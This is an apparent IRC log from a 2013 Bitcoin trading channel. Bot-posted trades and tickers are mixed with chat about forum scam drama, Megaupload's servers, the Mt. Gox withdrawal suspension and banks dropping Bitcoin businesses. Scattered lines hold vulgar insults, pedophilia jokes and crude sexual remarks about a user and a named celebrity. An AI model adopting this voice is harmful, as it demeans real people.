[TAT.VIRTUALMINE] 10 @ 0.0054 = 0.054 BTC [+] Jun 20 04:57:53 [BTCTC] [TAT.ASICMINER] 8 @ 0.02878 = 0.2302 BTC [+] Jun 20 04:57:57 [HAVELOCK] [ASICM] 2 @ 0.02837997 = 0.0568 BTC [+] Jun 20 04:58:36 [HAVELOCK] [ASICM] 1 @ 0.02837997 BTC [+] Jun 20 04:58:45 [BTCTC] [TAT.ASICMINER] 4 @ 0.02889 = 0.1156 BTC [+] Jun 20 04:58:56 [BTCTC] [TAT.ASICMINER] 19 @ 0.02889 = 0.5489 BTC [+] Jun 20 04:59:14 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0054 BTC [+] Jun 20 05:01:00 [BTCTC] [TAT.ASICMINER] 34 @ 0.028889 = 0.9822 BTC [-] Jun 20 05:01:10 [BTCTC] [TAT.ASICMINER] 12 @ 0.02889 = 0.3467 BTC [+] Jun 20 05:01:38 [HAVELOCK] [ASICM] 5 @ 0.02837997 = 0.1419 BTC [+] Jun 20 05:01:56 [HAVELOCK] [ASICM] 10 @ 0.02837997 = 0.2838 BTC [+] Jun 20 05:03:12 [HAVELOCK] [ASICM] 55 @ 0.02811001 = 1.5461 BTC [-] Jun 20 05:03:27 [HAVELOCK] [ASICM] 5 @ 0.02811 = 0.1406 BTC [-] Jun 20 05:03:53 [HAVELOCK] [ASICM] 18 @ 0.02811 = 0.506 BTC [-] Jun 20 05:06:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.027261 BTC [-] Jun 20 05:06:21 dude that inaba / garr thread is gold. Jun 20 05:06:35 [BTCTC] [DMS.SELLING] 22 @ 0.03575 = 0.7865 BTC [+] Jun 20 05:07:35 "All you people in this thread DO KNOW what 'Corporate Espionage' is right?? That it can carry serious jail time." Jun 20 05:08:20 hehe Jun 20 05:09:19 myea Jun 20 05:09:40 [BTCTC] [TAT.ASICMINER] 34 @ 0.027261 = 0.9269 BTC [-] Jun 20 05:09:47 but scammer tags are not used anymore or what? Jun 20 05:10:01 probly not Jun 20 05:10:07 cause http://bitbet.us/bet/314/bitcointalk-org-treasurer-to-be-scammer-tagged/ Jun 20 05:10:11 but there's always Untrustworthy tags Jun 20 05:10:25 [BTCTC] [BASIC-MINING] 1 @ 0.77 BTC [+] Jun 20 05:10:27 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00538 BTC [-] Jun 20 05:10:29 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.005389 = 0.0539 BTC [+] Jun 20 05:10:30 garr hold coins for teh forum Jun 20 05:10:31 [BTCTC] [TAT.VIRTUALMINE] 39 @ 0.0054 = 0.2106 BTC [+] Jun 20 05:10:42 cause he is supa trustworthy and all Jun 20 05:10:42 kakobrekla they were a stupid idea to begin with. Jun 20 05:10:56 i dont give a fuck about the idea, just care about the bet Jun 20 05:11:03 that's a point yeah. Jun 20 05:11:15 da fuck we gonna do with that one. Jun 20 05:11:21 i dunno Jun 20 05:11:24 refund Jun 20 05:11:29 or literal Jun 20 05:11:31 No Jun 20 05:11:40 or in spirit of the bet Yes Jun 20 05:11:47 it's a fucking mess. Jun 20 05:11:55 basically the only way to run a legitimate business in bitcoin Jun 20 05:12:03 is to not involve anyone else. because if tyou do, sooner or later Jun 20 05:12:11 they'll turn out to be huge gaping scamvaginas. Jun 20 05:12:19 well Jun 20 05:12:30 [BTCTC] [CRYPTO-TRADE] 1 @ 0.199997 BTC [+] Jun 20 05:12:33 [BTCTC] [ASICMINER-PT] 1 @ 2.8198 BTC [-] Jun 20 05:12:36 that's the only way to run one that is least likely to get caught scamming Jun 20 05:13:03 [MPEX] [S.MPOE] 13950 @ 0.00067495 = 9.4156 BTC [-] Jun 20 05:13:18 [BTCTC] [ASICMINER-PT] 1 @ 2.8198 BTC [-] Jun 20 05:13:27 [BTCTC] [ASICMINER-PT] 1 @ 2.8198 BTC [-] Jun 20 05:13:32 running one alone doesn't affect potential for being a scammer Jun 20 05:13:51 [BTCTC] [ASICMINER-PT] 2 @ 2.8199 = 5.6398 BTC [+] Jun 20 05:13:55 but looky here : run a bfl bet ? bfl changes spec. Jun 20 05:13:59 total shithole thing to do. Jun 20 05:14:12 run a bitcointalk bet ? bitcointalk changes the respective behaviour Jun 20 05:14:15 etc. Jun 20 05:14:27 well design typically takes responsibility for usage Jun 20 05:14:30 not that reverese Jun 20 05:14:35 reverse* Jun 20 05:14:42 [BTCTC] [TAT.ASICMINER] 11 @ 0.028887 = 0.3178 BTC [+] Jun 20 05:15:02 how you mean ? Jun 20 05:15:12 well in most design stuff Jun 20 05:15:16 user interface Jun 20 05:15:20 contracts Jun 20 05:15:21 etc Jun 20 05:15:28 the design is the framework Jun 20 05:15:38 and the user uses it howeve rhe can Jun 20 05:15:49 outside forces are not the problem Jun 20 05:15:52 the design is the problem Jun 20 05:15:55 it's funny tjhat the cognitive idiot actually imagined his shit move is going to help his rep. Jun 20 05:16:03 [BTCTC] [TAT.ASICMINER] 34 @ 0.028888 = 0.9822 BTC [+] Jun 20 05:16:11 ThickAsThieves this theory falls apart once you try to apply it to the point at hand. Jun 20 05:16:18 bet is porrly designed Jun 20 05:16:29 vetting of bets is poorly designed Jun 20 05:16:31 or both Jun 20 05:16:48 it's pretty much a contract design Jun 20 05:16:48 yeah, that is exactly what i said : vetting of bets is poorly designed, in that it allows things to reference bitcoin people Jun 20 05:16:50 who are liars. Jun 20 05:16:53 end of story. Jun 20 05:17:18 [BTCTC] [TAT.ASICMINER] 18 @ 0.02889 = 0.52 BTC [+] Jun 20 05:17:28 bet just needs some kind of sweeping "unforeseen circumstances" detail Jun 20 05:18:20 unforeseen circumstances clause can never cover the "bet subject acts in a deliberately deceitful manner" Jun 20 05:18:28 that's patently unfair to bettors, by its nature. Jun 20 05:19:02 i dunno Jun 20 05:19:04 in this case Jun 20 05:19:09 right. Jun 20 05:19:12 is why im bitching. Jun 20 05:19:12 it's pretty clearly a No still Jun 20 05:19:26 because in a village of scammy idiots, running any sort of legitimate business is significantly morer difficult. Jun 20 05:19:28 Theymos will obv never get -trrust either Jun 20 05:19:36 well, first we need to figure out if no more 'scammetags' are given for a while now Jun 20 05:19:42 this is why there's no r&d happening in angola./ Jun 20 05:19:43 he runs the site Jun 20 05:19:44 then bet can be refunded on that basis Jun 20 05:19:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.02889 BTC [+] Jun 20 05:19:53 wy would anyone ever bet he'd get scammer tagged? Jun 20 05:20:10 kakobrekla except bet refunds suck and the basis is weak and the no scammer tags fits the literasl no ;/ Jun 20 05:20:56 well yeah the second part is trueish Jun 20 05:21:22 i dunno Jun 20 05:21:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.02889 BTC [+] Jun 20 05:21:42 ThickAsThieves not him. the "escrows" Jun 20 05:21:43 i blame corporate espionage Jun 20 05:21:47 lmao Jun 20 05:21:50 that's officially meme now. Jun 20 05:22:04 [BTCTC] [TAT.ASICMINER] 8 @ 0.028887 = 0.2311 BTC [-] Jun 20 05:23:14 doesn't bitcointalk.org warn you not to sock? Jun 20 05:23:24 i assume Garr could be banned altogether no? Jun 20 05:23:29 [BTCTC] [TAT.ASICMINER] 8 @ 0.02889 = 0.2311 BTC [+] Jun 20 05:23:31 [BTCTC] [TAT.ASICMINER] 14 @ 0.0289 = 0.4046 BTC [+] Jun 20 05:23:41 but but he is the treasurer Jun 20 05:23:50 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006 BTC [+] Jun 20 05:24:06 wait, Garr is? Jun 20 05:24:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.0289 BTC [+] Jun 20 05:24:25 YES Jun 20 05:24:40 hahaha Jun 20 05:24:45 thats why im throwing that bet around Jun 20 05:25:04 why the fuck is some teen the treasurer? Jun 20 05:25:10 is theymos a teen too? Jun 20 05:25:15 cause theymost is almost teen too Jun 20 05:25:19 -t Jun 20 05:25:22 sigh Jun 20 05:25:34 and hashking is 13 Jun 20 05:25:46 pireate was 15 and a half though Jun 20 05:26:01 i wonder how many pedos are on btctalk Jun 20 05:26:17 seeing there's so many liberated tweens running around doing bzns and other serious shit Jun 20 05:26:29 i guess half the us catholic church has jalapeno preorders ? Jun 20 05:26:44 lolz Jun 20 05:26:52 i'll let you come over and play with my jalepeno Jun 20 05:26:56 lol Jun 20 05:28:23 some forum ass yelled at me for teklling him to calm down today, saying he's probly twice my age and i should be more respectful Jun 20 05:28:34 now i realize he was probly 16 thinking I was 8 Jun 20 05:28:37 you're what again, 28 ? Jun 20 05:28:40 34 Jun 20 05:29:01 past the point of saggy tits already huh,. Jun 20 05:29:22 how did you know?! Jun 20 05:31:48 ;;ticker Jun 20 05:31:49 BTCUSD ticker | Best bid: 108.15998, Best ask: 108.25996, Bid-ask spread: 0.09998, Last trade: 108.15998, 24 hour volume: 16793.53060533, 24 hour low: 105.80000, 24 hour high: 110.98630, 24 hour vwap: 108.05324 Jun 20 05:31:57 see ? all this drama pushed it up 7 points Jun 20 05:35:27 [BTCTC] [TAT.ASICMINER] 2 @ 0.028899 = 0.0578 BTC [-] Jun 20 05:37:06 [HAVELOCK] [VTX] 1 @ 0.48899979 BTC [+] Jun 20 05:37:42 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006 BTC [+] Jun 20 05:40:47 "Seems that the well known yet little discussed fact that the majority of people "in Bitcoin" have a mental age of about nine is finally being recognized and exploited commercially." Jun 20 05:40:52 ok, guess who said that and when Jun 20 05:41:03 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.006 = 0.12 BTC [+] Jun 20 05:42:24 you, Jan 2012 Jun 20 05:42:26 [BTCTC] [TAT.VIRTUALMINE] 28 @ 0.006 = 0.168 BTC [+] Jun 20 05:42:30 [BTCTC] [TAT.ASICMINER] 57 @ 0.0281 = 1.6017 BTC [-] Jun 20 05:43:13 [BTCTC] [TAT.ASICMINER] 2 @ 0.028 = 0.056 BTC [-] Jun 20 05:44:07 https://bitcointalk.org/index.php?topic=207716.msg2179210#msg2179210 Jun 20 05:44:53 pr is so fucking funny Jun 20 05:46:01 since then like 5 PMBs have been released Jun 20 05:46:06 :) Jun 20 05:46:14 you two make a whole together. Jun 20 05:46:25 she's super at her job, while delivering nothing whatsoever. Jun 20 05:47:45 [BTCTC] [ASICMINER-PT] 1 @ 2.720401 BTC [-] Jun 20 05:48:58 [BTCTC] [BASIC-MINING] 2 @ 0.77 = 1.54 BTC [+] Jun 20 05:50:21 Microsoft is abandoning its DRM policies for Xbox One, “as a result of feedback from the Xbox community.” Jun 20 05:52:35 0,0 Jun 20 05:52:56 brb going outside checking for the fucking rift straight to hell Jun 20 05:53:41 did you ever play Rift? Jun 20 05:53:59 dude there's a rift straight to hell oppened two houses down Jun 20 05:54:04 tis the end of the world. Jun 20 05:54:34 [MPEX] [S.MPOE] 6950 @ 0.00067495 = 4.6909 BTC [-] Jun 20 05:55:17 [BTCTC] [ASICMINER-PT] 1 @ 2.7212 BTC [+] Jun 20 05:59:12 Kim Dotcom victim of 'largest data MASSACRE in history' http://www.theregister.co.uk/2013/06/19/kim_dotcom_data_massacre/ Jun 20 05:59:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.028 BTC [-] Jun 20 06:00:05 mircea_popescu, did you see the John McAfee video? Jun 20 06:00:09 nop Jun 20 06:00:36 [BTCTC] [PAJKA.BOND] 15 @ 0.06 = 0.9 BTC [+] Jun 20 06:00:51 hit youtube took it down Jun 20 06:00:54 hunting... Jun 20 06:01:15 [BTCTC] [ASICMINER-PT] 1 @ 2.8199 BTC [+] Jun 20 06:01:26 shit* Jun 20 06:01:32 [HAVELOCK] [VTX] 2 @ 0.48899979 = 0.978 BTC [+] Jun 20 06:01:33 [BTCTC] [ASICMINER-PT] 1 @ 2.82 BTC [+] Jun 20 06:01:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.028889 BTC [+] Jun 20 06:02:01 [HAVELOCK] [ASICM] 27 @ 0.028388 = 0.7665 BTC [+] Jun 20 06:02:35 http://www.thehollywoodgossip.com/videos/how-to-uninstall-mcafee-antivirus/ Jun 20 06:02:45 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.0065 = 0.026 BTC [+] Jun 20 06:03:05 [HAVELOCK] [ASICM] 64 @ 0.028389 = 1.8169 BTC [+] Jun 20 06:03:06 antivirus shit still exists ;/ Jun 20 06:03:18 [BTCTC] [COGNITIVE] 1 @ 0.26 BTC [+] Jun 20 06:03:20 [BTCTC] [COGNITIVE] 4 @ 0.251001 = 1.004 BTC [-] Jun 20 06:03:21 [BTCTC] [COGNITIVE] 2 @ 0.251 = 0.502 BTC [-] Jun 20 06:03:23 [BTCTC] [COGNITIVE] 1 @ 0.25001 BTC [-] Jun 20 06:03:23 i didnt know the owner actually hated his own software Jun 20 06:03:24 [BTCTC] [COGNITIVE] 2 @ 0.25 = 0.5 BTC [-] Jun 20 06:03:28 pretty funny Jun 20 06:04:09 lol Jun 20 06:04:39 [HAVELOCK] [ASICM] 73 @ 0.028389 = 2.0724 BTC [+] Jun 20 06:04:53 ? Jun 20 06:04:54 [BTCTC] [TAT.ASICMINER] 10 @ 0.027511 = 0.2751 BTC [-] Jun 20 06:05:11 the link i gave starts w a commercial Jun 20 06:05:18 oh,no Jun 20 06:06:33 [BTCTC] [BTC-BOND] 10 @ 0.009996 = 0.1 BTC [+] Jun 20 06:07:05 cheers Jun 20 06:09:21 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0065 BTC [+] Jun 20 06:09:38 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.0065 = 0.0195 BTC [+] Jun 20 06:11:24 [BTCTC] [BTC-BOND] 4 @ 0.009997 = 0.04 BTC [+] Jun 20 06:11:26 [BTCTC] [BTC-BOND] 1 @ 0.009997 BTC [+] Jun 20 06:17:07 ThickAsThieves so wait. kim guy is supposedly into bitcoin, has not a dime left to buy servers ? Jun 20 06:18:15 [BTCTC] [ASICMINER-PT] 1 @ 2.82 BTC [+] Jun 20 06:18:42 [BTCTC] [BASIC-MINING] 4 @ 0.77 = 3.08 BTC [+] Jun 20 06:20:11 "You say that as if it's a bad thing. I can't begin to contemplate what must be going on inside the skullous cavity of some dood imagining exchange executives " ... buy their own servers? ;) Jun 20 06:20:39 -"exchange" Jun 20 06:21:00 [BTCTC] [ASICMINER-PT] 1 @ 2.82 BTC [+] Jun 20 06:21:11 [BTCTC] [TAT.ASICMINER] 4 @ 0.028877 = 0.1155 BTC [+] Jun 20 06:21:38 wait wut ? Jun 20 06:21:58 the story here is kim guy had ALL his moneys confiscatered so now can't pay leaseweb for servers. Jun 20 06:22:18 how did they confiscate his btc ? wasn't he a big deal btc investor with like the twinkletwinks or w/e ? Jun 20 06:22:21 oh the version i read was they never told him they were gonna delete Jun 20 06:22:34 and he just found out now Jun 20 06:22:42 On Wednesday, Dotcom said that he would have bought back all of Megaupload's servers from the companies that hosted them, but he was unable to because the DoJ had frozen all of the company's assets and refused to release even a portion of them for the purpose. Jun 20 06:22:48 i dunno, just going by what they said Jun 20 06:22:51 ah Jun 20 06:22:56 i read a diff article Jun 20 06:22:59 than the one i linked Jun 20 06:23:04 this is register Jun 20 06:23:47 http://www.theverge.com/2013/6/19/4445660/leaseweb-megaupload-kim-dotcom-dispute-twitter Jun 20 06:23:48 [MPEX] [S.MPOE] 1316 @ 0.00067523 = 0.8886 BTC [+] Jun 20 06:23:51 thats the one i read Jun 20 06:24:00 just wanted to give thereg some love Jun 20 06:24:54 did anyone REALLY use it for anything other than hosting illegal shit? Jun 20 06:25:16 why? Jun 20 06:25:33 why would you use some warez repository for personal shit? Jun 20 06:26:29 wha? Jun 20 06:26:31 [23:25] personal shit sure Jun 20 06:26:38 [23:26] i wouldnt do such a thing Jun 20 06:27:06 it's ok Jun 20 06:27:13 no need Jun 20 06:27:19 ;;nethash Jun 20 06:27:20 131824.353717 Jun 20 06:28:33 and logic Jun 20 06:28:53 that's all that matters Jun 20 06:29:03 communication is a one-way street of course Jun 20 06:29:38 [BTCTC] [TAT.ASICMINER] 2 @ 0.028889 = 0.0578 BTC [+] Jun 20 06:29:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.028877 BTC [-] Jun 20 06:29:51 [BTCTC] [TAT.ASICMINER] 2 @ 0.0285 = 0.057 BTC [-] Jun 20 06:29:53 afaik people mostly used it to mock the crypto Jun 20 06:30:45 [BTCTC] [ASICMINER-PT] 1 @ 2.82 BTC [+] Jun 20 06:31:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.028889 BTC [+] Jun 20 06:31:26 i used it instead of calling adobe to release my licenses from PCs that no longer existed Jun 20 06:31:45 but then when i did actully do that Jun 20 06:31:54 they released more licenses than i owned Jun 20 06:32:13 :/ Jun 20 06:33:02 * ThickAsThieves has been canned by assbot forever for using Adobe. Jun 20 06:33:06 [BTCTC] [BITVPS] 3 @ 0.000833 = 0.0025 BTC [+] Jun 20 06:33:31 [BTCTC] [TAT.ASICMINER] 26 @ 0.028877 = 0.7508 BTC [-] Jun 20 06:33:33 [BTCTC] [TAT.ASICMINER] 2 @ 0.0285 = 0.057 BTC [-] Jun 20 06:33:35 [BTCTC] [TAT.ASICMINER] 6 @ 0.028 = 0.168 BTC [-] Jun 20 06:33:35 yknow i actually tried not to Jun 20 06:33:35 [BTCTC] [TAT.ASICMINER] 6 @ 0.02777 = 0.1666 BTC [-] Jun 20 06:33:37 [BTCTC] [TAT.ASICMINER] 23 @ 0.027526 = 0.6331 BTC [-] Jun 20 06:33:51 i am much happier using CorelDraw for vector Jun 20 06:34:10 but Corel's photo editor blows Jun 20 06:34:33 [BTCTC] [ASICMINER-PT] 1 @ 2.8 BTC [-] Jun 20 06:34:44 real men vector in tex Jun 20 06:35:17 my first "real" career job was in tradeshow graphics Jun 20 06:35:22 where CorelDraw is king Jun 20 06:35:32 but srsly now, ever tried inkscape ? Jun 20 06:35:37 no Jun 20 06:35:44 i'm too fast in Corel now Jun 20 06:35:49 it does what i need Jun 20 06:36:17 pretty much Corel & Photoshop is all I use Jun 20 06:36:29 you'd be faster in that just because it's actually programmable. Jun 20 06:36:34 only reason I use InDesign is when I have to cuz client Jun 20 06:36:52 same for Illustrator Jun 20 06:36:54 [BTCTC] [ASICMINER-PT] 3 @ 2.82 = 8.46 BTC [+] Jun 20 06:36:59 [BTCTC] [TAT.ASICMINER] 33 @ 0.028889 = 0.9533 BTC [+] Jun 20 06:37:03 [BTCTC] [TAT.ASICMINER] 29 @ 0.02889 = 0.8378 BTC [+] Jun 20 06:38:02 but lordy am I happy Quark Xpress lost the wars Jun 20 06:38:12 what a piece of shit that was Jun 20 06:39:21 well i'm off to tittyfuck gemma atkinson Jun 20 06:39:24 take care all. Jun 20 06:39:38 hf **** BEGIN LOGGING AT Thu Jun 20 15:39:46 2013 Jun 20 15:43:54 [BTCTC] [RSM] 20 @ 0.029 = 0.58 BTC [+] Jun 20 15:52:58 [BTCTC] [TAT.ASICMINER] 6 @ 0.028889 = 0.1733 BTC [+] Jun 20 15:54:32 [HAVELOCK] [HIM] 1 @ 0.296999 BTC [+] Jun 20 15:54:42 [BTCTC] [TAT.ASICMINER] 29 @ 0.02889 = 0.8378 BTC [+] Jun 20 15:54:57 [HAVELOCK] [ASICM] 5 @ 0.028499 = 0.1425 BTC [+] Jun 20 15:55:56 [BTCTC] [DMS.SELLING] 30 @ 0.038 = 1.14 BTC [+] Jun 20 15:58:08 [BTCTC] [TAT.ASICMINER] 3 @ 0.02889 = 0.0867 BTC [+] Jun 20 15:58:23 [BTCTC] [TAT.ASICMINER] 12 @ 0.02889 = 0.3467 BTC [+] Jun 20 16:02:20 [HAVELOCK] [ASICM] 99 @ 0.0285 = 2.8215 BTC [+] Jun 20 16:03:46 [BTCTC] [S.DICE-PT] 15 @ 0.002701 = 0.0405 BTC [+] Jun 20 16:03:47 [BTCTC] [S.DICE-PT] 20 @ 0.00271 = 0.0542 BTC [+] Jun 20 16:03:51 [BTCTC] [S.DICE-PT] 200 @ 0.002715 = 0.543 BTC [+] Jun 20 16:03:53 [BTCTC] [S.DICE-PT] 50 @ 0.002718 = 0.1359 BTC [+] Jun 20 16:03:54 [BTCTC] [S.DICE-PT] 56 @ 0.00272 = 0.1523 BTC [+] Jun 20 16:03:59 [BTCTC] [S.DICE-PT] 226 @ 0.002725 = 0.6159 BTC [+] Jun 20 16:04:05 [BTCTC] [S.DICE-PT] 53 @ 0.002725 = 0.1444 BTC [+] Jun 20 16:07:07 mjr_: hello Jun 20 16:10:32 [BTCTC] [TAT.ASICMINER] 21 @ 0.02889 = 0.6067 BTC [+] Jun 20 16:13:48 [BTCTC] [TAT.ASICMINER] 4 @ 0.02889 = 0.1156 BTC [+] Jun 20 16:13:53 [BTCTC] [TAT.ASICMINER] 13 @ 0.029 = 0.377 BTC [+] Jun 20 16:14:43 [HAVELOCK] [ASICM] 3 @ 0.02892 = 0.0868 BTC [+] Jun 20 16:14:44 [HAVELOCK] [ASICM] 30 @ 0.028979 = 0.8694 BTC [+] Jun 20 16:22:57 [HAVELOCK] [ASICM] 11 @ 0.028979 = 0.3188 BTC [+] Jun 20 16:23:09 [BTCTC] [TAT.ASICMINER] 22 @ 0.029 = 0.638 BTC [+] Jun 20 16:23:15 [BTCTC] [TAT.ASICMINER] 10 @ 0.029 = 0.29 BTC [+] Jun 20 16:24:59 [BTCTC] [TAT.ASICMINER] 5 @ 0.029 = 0.145 BTC [+] Jun 20 16:29:14 [BTCTC] [DMS.SELLING] 69 @ 0.038 = 2.622 BTC [+] Jun 20 16:30:27 [BTCTC] [TAT.ASICMINER] 4 @ 0.029 = 0.116 BTC [+] Jun 20 16:30:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.029 BTC [+] Jun 20 16:30:43 [BTCTC] [TAT.ASICMINER] 6 @ 0.029 = 0.174 BTC [+] Jun 20 16:32:32 [HAVELOCK] [VTX] 6 @ 0.469999 = 2.82 BTC [-] Jun 20 16:33:17 [HAVELOCK] [ASICM] 16 @ 0.028979 = 0.4637 BTC [+] Jun 20 16:33:42 [HAVELOCK] [ASICM] 47 @ 0.02898 = 1.3621 BTC [+] Jun 20 16:34:46 [HAVELOCK] [ASICM] 185 @ 0.02899 = 5.3632 BTC [+] Jun 20 16:39:09 [BTCTC] [BASIC-MINING] 1 @ 1.17 BTC [+] Jun 20 16:42:47 [BTCTC] [DMS.MINING] 1 @ 0.019279 BTC [+] Jun 20 16:42:52 [BTCTC] [DMS.MINING] 1 @ 0.019279 BTC [+] Jun 20 16:49:22 [BTCTC] [DMS.MINING] 1 @ 0.019279 BTC [+] Jun 20 16:49:25 [HAVELOCK] [ASICM] 95 @ 0.0289 = 2.7455 BTC [-] Jun 20 16:49:27 [BTCTC] [DMS.MINING] 1 @ 0.019279 BTC [+] Jun 20 16:49:29 [BTCTC] [DMS.MINING] 1 @ 0.019279 BTC [+] Jun 20 16:49:29 [BTCTC] [DMS.MINING] 1 @ 0.019279 BTC [+] Jun 20 16:49:57 [BTCTC] [DMS.MINING] 15 @ 0.01928 = 0.2892 BTC [+] Jun 20 16:53:03 ;;ticker Jun 20 16:53:05 BTCUSD ticker | Best bid: 110.40001, Best ask: 110.89999, Bid-ask spread: 0.49998, Last trade: 110.40000, 24 hour volume: 26089.65598104, 24 hour low: 106.46088, 24 hour high: 112.79000, 24 hour vwap: 109.77036 Jun 20 16:53:22 inaba drama continues, more twists, more turns. net result +2. Jun 20 16:53:26 slowing down, yest it was +8 Jun 20 16:54:15 ;;bc,stats Jun 20 16:54:17 Current Blocks: 242446 | Current Difficulty: 1.933925827238668E7 | Next Difficulty At Block: 243935 | Next Difficulty In: 1489 blocks | Next Difficulty In About: 1 week, 2 days, 14 hours, 33 minutes, and 17 seconds | Next Difficulty Estimate: 19278222.2671 | Estimated Percent Change: -0.31561 Jun 20 16:55:05 you hear about Gox? Jun 20 16:55:23 https://mtgox.com/press_release_20130620.html Jun 20 16:55:40 [BTCTC] [DMS.PURCHASE] 18 @ 0.054499 = 0.981 BTC [-] Jun 20 16:55:42 We are currently making improvements to process withdrawals of United States Dollar (USD) denominations, and as a result are temporarily suspending cash withdrawals of USD for the next two weeks. Jun 20 16:55:57 oh, I didn't know it was for *two* weeks Jun 20 16:56:13 [MPEX] [S.MPOE] 14200 @ 0.00069881 = 9.9231 BTC [-] Jun 20 16:56:14 [MPEX] [S.MPOE] 4993 @ 0.00069726 = 3.4814 BTC [-] Jun 20 16:56:42 really, you might need a day to change to a new system, but what are they going to do for two weeks? Jun 20 16:56:53 lmao two weeks Jun 20 16:56:56 implement NSA backdoor Jun 20 16:57:03 two weeks (a bfl tm) Jun 20 16:57:16 i wonder if BFL gets royalties Jun 20 16:57:17 takes a day to go in production. unless that's how they develop: in production Jun 20 16:57:25 https://bitcointalk.org/index.php?topic=231960.msg2508507#msg2508507 that kinda blew up so Jun 20 16:57:27 [HAVELOCK] [ASICM] 8 @ 0.0289 = 0.2312 BTC [-] Jun 20 16:57:28 [HAVELOCK] [ASICM] 2 @ 0.0289 = 0.0578 BTC [-] Jun 20 16:59:03 we really need more exchanges… Jun 20 16:59:12 [BTCTC] [DMS.MINING] 1 @ 0.01928 BTC [+] Jun 20 16:59:13 "If your withdrawal is larger than 10,000 USD (equivalent), it will take at least 2 weeks to process" that sounds very government intervention Jun 20 16:59:33 Gox is rocking their Bitcoin Foindation badge prominently now Jun 20 17:00:18 they used it as the press release uimage on facebook Jun 20 17:00:35 lol, first comment on Facebook in response to the USD thing "What is really a joke is that we don't have LTC yet" Jun 20 17:01:26 ThickAsThieves teh bitcoin scamdation huh. Jun 20 17:02:02 usagi : MPOE-PR likes to make quips at me for some reason. Jun 20 17:02:12 fascinating Jun 20 17:03:03 fascinating indeed, talking to usagi just gives me a headache Jun 20 17:03:40 i'd have him on ignore if he weren't so polite to me Jun 20 17:03:49 but mostly I skip his posts Jun 20 17:04:32 http://www.thegenesisblock.com/wp-content/uploads/2013/06/BTC-USD-Exchange-Market-Share.png Jun 20 17:04:36 i think you Jun 20 17:04:46 're newer herer than his large meltdown last summer ? Jun 20 17:04:51 yeh Jun 20 17:04:58 was a sight to behold. course like 1k posts were meanwhile deleted Jun 20 17:05:06 got my first coin in Nov Jun 20 17:06:09 this is the first week where I finally stopped clicking Unignore to see what people I ignored said Jun 20 17:06:18 ;;google backtraced it youtube.com Jun 20 17:06:29 if someone gets ignored, they simply need to be Jun 20 17:06:33 that';s basically the summary of it. Jun 20 17:06:57 (EXTENDED REMIX) Because I Back-Traced It (You dun ... - YouTube: ; Because I Backtraced it! - YouTube: ; Backtraced It | You dun goofed - YouTube: Jun 20 17:06:58 should i watch the remix? Jun 20 17:07:20 notrly. original always best Jun 20 17:09:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.0289 BTC [-] Jun 20 17:09:39 [BTCTC] [TAT.ASICMINER] 53 @ 0.0289 = 1.5317 BTC [-] Jun 20 17:10:06 i like how she fixes her hair while balling Jun 20 17:10:40 i was, however, hoping for a real usagi video Jun 20 17:10:50 i'll just pretend he's the dad Jun 20 17:11:29 well actually he's a fat guy from the midwest who pretends to be a juvenile japanese female with magicval powers, karate expertise Jun 20 17:11:32 and i think more stuff Jun 20 17:12:20 ;;nethash Jun 20 17:12:21 138984.206281 Jun 20 17:12:22 [BTCTC] [ASICMINER-PT] 1 @ 2.84 BTC [-] Jun 20 17:12:24 [BTCTC] [ASICMINER-PT] 1 @ 2.84 BTC [-] Jun 20 17:13:10 [HAVELOCK] [ASICM] 81 @ 0.0289 = 2.3409 BTC [-] Jun 20 17:13:52 [BTCTC] [TAT.ASICMINER] 14 @ 0.0289 = 0.4046 BTC [-] Jun 20 17:15:56 https://bitcointalk.org/index.php?topic=238474.msg2530579#msg2530579 lol mnw trying to cause trbl Jun 20 17:16:24 [BTCTC] [TAT.ASICMINER] 3 @ 0.0286 = 0.0858 BTC [-] Jun 20 17:19:29 Bitspend.net funds seized and service closed Jun 20 17:21:30 [BTCTC] [DMS.SELLING] 60 @ 0.0385 = 2.31 BTC [+] Jun 20 17:22:05 i assume no license? Jun 20 17:22:11 MSB, etc Jun 20 17:22:11 [BTCTC] [ASICMINER-PT] 3 @ 2.84 = 8.52 BTC [-] Jun 20 17:24:37 [BTCTC] [BASIC-MINING] 1 @ 1.17 BTC [+] Jun 20 17:24:39 [BTCTC] [BASIC-MINING] 1 @ 1.17 BTC [+] Jun 20 17:24:42 [BTCTC] [BASIC-MINING] 1 @ 1.179 BTC [+] Jun 20 17:24:44 [BTCTC] [BASIC-MINING] 1 @ 1.18 BTC [+] Jun 20 17:24:46 [BTCTC] [BASIC-MINING] 1 @ 1.189 BTC [+] Jun 20 17:24:47 [BTCTC] [BASIC-MINING] 1 @ 1.199 BTC [+] Jun 20 17:24:53 [BTCTC] [ASICMINER-PT] 6 @ 2.831 = 16.986 BTC [-] Jun 20 17:28:32 [BTCTC] [DMS.PURCHASE] 30 @ 0.054499 = 1.635 BTC [-] Jun 20 17:30:50 actually it's pretty funny, clueless idiot indignation. Jun 20 17:30:58 Chase bank and another bank, have both decided that we as a Bitcoin based business are "Too High Risk" of clients, and have frozen/shut down our accounts. We were NOT given notice, and we were simply told "your funds will be sent to you by check within 30 days". This is not something we were ever warned about, given notice of, or even received the courtesy of a phone call from the bank beforehand. Jun 20 17:31:04 he was never warned about!!1 Jun 20 17:32:44 [BTCTC] [TAT.ASICMINER] 4 @ 0.0289 = 0.1156 BTC [+] Jun 20 17:33:39 [BTCTC] [TAT.ASICMINER] 50 @ 0.028301 = 1.4151 BTC [-] Jun 20 17:33:59 likely it was he that never warned them Jun 20 17:34:38 d'oh. Jun 20 17:34:53 [HAVELOCK] [KCIM] 1 @ 1.119899 BTC [-] Jun 20 17:35:02 banks routinely keep 